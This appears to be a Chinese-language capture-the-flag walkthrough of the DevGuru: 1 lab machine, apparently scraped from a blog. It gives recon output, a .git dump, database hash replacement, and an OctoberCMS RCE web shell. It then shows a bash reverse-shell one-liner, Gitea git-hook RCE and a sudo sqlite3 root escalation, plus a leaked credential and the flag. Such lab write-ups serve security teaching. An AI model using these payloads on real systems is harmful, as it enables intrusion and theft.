红队打靶练习:DEVGURU: 1

目录

信息收集

1、arp

2、nmap

3、dirsearch

WEB

web信息收集

8585端口

漏洞利用

提权

系统信息收集

横向渗透

get flag

信息收集

1、arp
┌──(root㉿ru)-[~/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:50:56:20:80:1b, IPv4: 192.168.10.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.10.1    00:50:56:c0:00:08       VMware, Inc.
192.168.10.2    00:50:56:ef:1c:2c       VMware, Inc.
192.168.10.129  00:50:56:3d:f3:a2       VMware, Inc.
192.168.10.254  00:50:56:e3:cb:23       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.512 seconds (101.91 hosts/sec). 4 responded

2、nmap
端口探测

┌──(root㉿ru)-[~/kali]
└─# nmap -p- 192.168.10.129 --min-rate 10000 -oA port
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-11 15:58 CST
Nmap scan report for 192.168.10.129
Host is up (0.00073s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8585/tcp open  unknown
MAC Address: 00:50:56:3D:F3:A2 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 6.47 seconds


信息探测

┌──(root㉿ru)-[~/kali]
└─# nmap -sCV -O -p 22,80,8585  192.168.10.129 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-11 15:59 CST
Nmap scan report for 192.168.10.129
Host is up (0.00048s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 2a:46:e8:2b:01:ff:57:58:7a:5f:25:a4:d6:f2:89:8e (RSA)
|   256 08:79:93:9c:e3:b4:a4:be:80:ad:61:9d:d3:88:d2:84 (ECDSA)
|_  256 9c:f9:88:d4:33:77:06:4e:d9:7c:39:17:3e:07:9c:bd (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-generator: DevGuru
|_http-title: Corp - DevGuru
| http-git:
|   192.168.10.129:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|     Last commit message: first commit
|     Remotes:
|       http://devguru.local:8585/frank/devguru-website.git
|_    Project type: PHP application (guessed from .gitignore)
8585/tcp open  unknown
| fingerprint-strings:
|   GenericLines:
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest:
|     HTTP/1.0 200 OK
|     Content-Type: text/html; charset=UTF-8
|     Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
|     Set-Cookie: i_like_gitea=c2502ca5a6027f8c; Path=/; HttpOnly
|     Set-Cookie: _csrf=m6_Uyad2EUuvXga7fCnRP0LOxC46MTcwNzYzODQwMTQwMTk3ODQzMQ; Path=/; Expires=Mon, 12 Feb 2024 08:00:01 GMT; HttpOnly
|     X-Frame-Options: SAMEORIGIN
|     Date: Sun, 11 Feb 2024 08:00:01 GMT
|     
|     
|     
|     
|     
|     
|      Gitea: Git with a cup of tea 
|     
|     
|     
|     
|     
|     
|     
|     
|     Page Not Found - Gitea: Git with a cup of tea 
|     
|     
|     
|_    红队打靶练习:DEVGURU: 1_第1张图片


3、dirsearch
──(root㉿ru)-[~/kali]
└─# dirsearch -u http://192.168.10.129 -e* -x 403
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25 | Wordlist size: 14594

Output File: /root/kali/reports/http_192.168.10.129/_24-02-11_16-00-11.txt

Target: http://192.168.10.129/

[16:00:11] Starting:
[16:00:16] 200 -  276B  - /.git/config
[16:00:16] 301 -  315B  - /.git  ->  http://192.168.10.129/.git/
[16:00:16] 200 -   73B  - /.git/description
[16:00:16] 200 -   13B  - /.git/COMMIT_EDITMSG
[16:00:16] 200 -   23B  - /.git/HEAD
[16:00:16] 200 -  308KB - /.git/index
[16:00:16] 200 -  158B  - /.git/logs/HEAD
[16:00:16] 200 -  240B  - /.git/info/exclude
[16:00:16] 301 -  325B  - /.git/logs/refs  ->  http://192.168.10.129/.git/logs/refs/
[16:00:16] 301 -  331B  - /.git/logs/refs/heads  ->  http://192.168.10.129/.git/logs/refs/heads/
[16:00:16] 301 -  333B  - /.git/logs/refs/remotes  ->  http://192.168.10.129/.git/logs/refs/remotes/
[16:00:16] 301 -  340B  - /.git/logs/refs/remotes/origin  ->  http://192.168.10.129/.git/logs/refs/remotes/origin/
[16:00:16] 200 -  158B  - /.git/logs/refs/heads/master
[16:00:16] 200 -  142B  - /.git/logs/refs/remotes/origin/master
[16:00:16] 301 -  326B  - /.git/refs/heads  ->  http://192.168.10.129/.git/refs/heads/
[16:00:16] 301 -  328B  - /.git/refs/remotes  ->  http://192.168.10.129/.git/refs/remotes/
[16:00:16] 301 -  335B  - /.git/refs/remotes/origin  ->  http://192.168.10.129/.git/refs/remotes/origin/
[16:00:16] 200 -   41B  - /.git/refs/remotes/origin/master
[16:00:16] 301 -  325B  - /.git/refs/tags  ->  http://192.168.10.129/.git/refs/tags/
[16:00:16] 200 -   41B  - /.git/refs/heads/master
[16:00:16] 200 -  413B  - /.gitignore
[16:00:17] 200 -    2KB - /.htaccess
[16:00:28] 200 -    3KB - /about
[16:00:28] 200 -    3KB - /About
[16:00:48] 200 -    2KB - /adminer.php
[16:00:57] 302 -  414B  - /backend/  ->  http://192.168.10.129/backend/backend/auth
[16:01:05] 301 -  317B  - /config  ->  http://192.168.10.129/config/
[16:01:26] 200 -    3KB - /index.php
[16:01:38] 301 -  318B  - /modules  ->  http://192.168.10.129/modules/
[16:01:49] 301 -  318B  - /plugins  ->  http://192.168.10.129/plugins/
[16:01:53] 200 -    1KB - /README.md
[16:01:58] 200 -    0B  - /server.php
[16:01:59] 200 -    2KB - /services
[16:01:59] 200 -    2KB - /services/
[16:02:05] 301 -  318B  - /storage  ->  http://192.168.10.129/storage/
[16:02:10] 301 -  317B  - /themes  ->  http://192.168.10.129/themes/

WEB

web信息收集

红队打靶练习:DEVGURU: 1_第2张图片


目录中存在git目录,猜测存在git泄露!

使用脚本进行脱取!

GitHub - 0xHJK/dumpall: 一款信息泄漏利用工具,适用于.git/.svn/.DS_Store泄漏和目录列出一款信息泄漏利用工具,适用于.git/.svn/.DS_Store泄漏和目录列出. Contribute to 0xHJK/dumpall development by creating an account on GitHub.icon-default.png?t=N7T8https://github.com/0xHJK/dumpall


┌──(root㉿ru)-[~/tools/POC/dumpall]
└─# python3 dumpall.py

       ___                  ___   __   __
      / _ \__ ____ _  ___  / _ | / /  / /
     / // / // /  ' \/ _ \/ __ |/ /__/ /__
    /____/\_,_/_/_/_/ .__/_/ |_/____/____/
                   /_/

    https://github.com/0xHJK/dumpall
    ---------------------------------------------
                                       v0.4.0 HJK

请输入目标URL,必须包含http://或https://
 >>: http://192.168.10.129/.git/
Target: http://192.168.10.129/.git/
Output Directory: /root/tools/POC/dumpall/192.168.10.129_None

Module: dumpall.addons.gitdumper

红队打靶练习:DEVGURU: 1_第3张图片


红队打靶练习:DEVGURU: 1_第4张图片


发现了个登录框!

红队打靶练习:DEVGURU: 1_第5张图片


在config文件夹内发现database文件,发现了mysql的账号密码!

我们尝试登录mysql的那个管理页面!

红队打靶练习:DEVGURU: 1_第6张图片


红队打靶练习:DEVGURU: 1_第7张图片


红队打靶练习:DEVGURU: 1_第8张图片


存在账号名以及密码!密码是哈希值!

红队打靶练习:DEVGURU: 1_第9张图片


类型是bcrypt类型!破解的话很慢!我们尝试别的方法!


8585端口

红队打靶练习:DEVGURU: 1_第10张图片


红队打靶练习:DEVGURU: 1_第11张图片


红队打靶练习:DEVGURU: 1_第12张图片


红队打靶练习:DEVGURU: 1_第13张图片


三个登录框!用户名肯定是frank 既然爆破浪费时间,我们直接加密一个该类型的密码!然后进行替换!

红队打靶练习:DEVGURU: 1_第14张图片


红队打靶练习:DEVGURU: 1_第15张图片


直接编辑即可!

漏洞利用

红队打靶练习:DEVGURU: 1_第16张图片


红队打靶练习:DEVGURU: 1_第17张图片


这个可以直接登录!  frank:自己设置的密码!

这个cms叫 OctoberCMS 可以搜索一下!


经过搜索发现远程代码执行漏洞

OctoberCMS Authenticated RCE (CVE-2022-21705)Join us in the discovery and exploitation of an authenticated remote code execution vulnerability in OctoberCMSicon-default.png?t=N7T8https://cyllective.com/blog/post/octobercms-cve-2022-21705


红队打靶练习:DEVGURU: 1_第18张图片


红队打靶练习:DEVGURU: 1_第19张图片


经过poc验证,确实存在该漏洞!这样我们就可以构造paylaod进行反弹shell了!

红队打靶练习:DEVGURU: 1_第20张图片


function onInit() {
system($_GET['cmd']);
}


红队打靶练习:DEVGURU: 1_第21张图片


利用成功!我们进行反弹shell!

payload

/bin/bash -c 'bash -i >& /dev/tcp/192.168.10.128/1234 0>&1'

/bin/bash%20-c%20%27bash%20-i%20%3E%26%20/dev/tcp/192.168.10.128/1234%200%3E%261%27   url编码!


红队打靶练习:DEVGURU: 1_第22张图片


提权

系统信息收集
ww-data@devguru:/home$ find / -user frank 2>/dev/null

/var/backups/app.ini.bak
/usr/local/bin/gitea
/opt/gitea
/home/frank
/etc/gitea

经过信息收集,我们发现www-date用户并不能做什么!我们只能进行横向了!
在这里,我是用find命令查看用户frank的文件!其中/var/backups/app.ini.bak文件,最有意思!我们查看一下!


得到用户名以及密码

gitea:UfFPTF8C8jjxVF2m : gitea


红队打靶练习:DEVGURU: 1_第23张图片


在user表中得到frank用户以及密码!这个我们直接加密并替换!

红队打靶练习:DEVGURU: 1_第24张图片


加密类型:pbkdf2,但是这个需要进行加盐处理,我们直接改为bcrypt类型!配置文件里可以查看到,可以修改加密类型!


红队打靶练习:DEVGURU: 1_第25张图片


红队打靶练习:DEVGURU: 1_第26张图片


红队打靶练习:DEVGURU: 1_第27张图片


红队打靶练习:DEVGURU: 1_第28张图片


登录成功!

横向渗透

红队打靶练习:DEVGURU: 1_第29张图片


发现该cms版本是1.12.5!我们搜索一下该漏洞!

GitHub - p0dalirius/CVE-2020-14144-GiTea-git-hooks-rce: A script to exploit CVE-2020-14144 - GiTea authenticated Remote Code Execution using git hooksA script to exploit CVE-2020-14144 - GiTea authenticated Remote Code Execution using git hooks - GitHub - p0dalirius/CVE-2020-14144-GiTea-git-hooks-rce: A script to exploit CVE-2020-14144 - GiTea authenticated Remote Code Execution using git hooksicon-default.png?t=N7T8https://github.com/p0dalirius/CVE-2020-14144-GiTea-git-hooks-rce


红队打靶练习:DEVGURU: 1_第30张图片


红队打靶练习:DEVGURU: 1_第31张图片


红队打靶练习:DEVGURU: 1_第32张图片


红队打靶练习:DEVGURU: 1_第33张图片


随便更改一个,然后保存即可!在保存的时候会调用配置文件,从而达到rce的效果!

红队打靶练习:DEVGURU: 1_第34张图片


frank@devguru:~/gitea-repositories/frank/devguru-website.git$ id
id
uid=1000(frank) gid=1000(frank) groups=1000(frank)
frank@devguru:~/gitea-repositories/frank/devguru-website.git$

frank@devguru:~/gitea-repositories/frank/devguru-website.git$ sudo -l
sudo -l
Matching Defaults entries for frank on devguru:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User frank may run the following commands on devguru:
    (ALL, !root) NOPASSWD: /usr/bin/sqlite3

红队打靶练习:DEVGURU: 1_第35张图片



paylaod 

sudo -u#-1 /usr/bin/sqlite3 /dev/null '.shell /bin/sh'

红队打靶练习:DEVGURU: 1_第36张图片


payload一定要写对!提权成功!

get flag
cd /root
ls -al
total 72
drwx------  8 root root 4096 Nov 19  2020 .
drwxr-xr-x 25 root root 4096 Nov 19  2020 ..
lrwxrwxrwx  1 root root    9 Nov 18  2020 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Apr  9  2018 .bashrc
drwx------  2 root root 4096 Nov 19  2020 .cache
drwx------  3 root root 4096 Nov 18  2020 .config
-rw-r--r--  1 root root   76 Nov 19  2020 .gitconfig
drwx------  3 root root 4096 Nov 19  2020 .gnupg
-rw-------  1 root root   38 Nov 18  2020 .lesshst
drwxr-xr-x  3 root root 4096 Nov 18  2020 .local
lrwxrwxrwx  1 root root    9 Nov 18  2020 .mysql_history -> /dev/null
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   66 Nov 19  2020 .selected_editor
drwx------  2 root root 4096 Nov 19  2020 .ssh
drwxr-xr-x  2 root root 4096 Nov 18  2020 .vim
-rw-------  1 root root 9900 Nov 19  2020 .viminfo
-r--------  1 root root   88 Nov 19  2020 msg.txt
-r--------  1 root root   33 Nov 18  2020 root.txt
cat root.txt
96440606fb88aa7497cde5a8e68daf8f

你可能感兴趣的:(红队渗透靶机,网络安全,安全)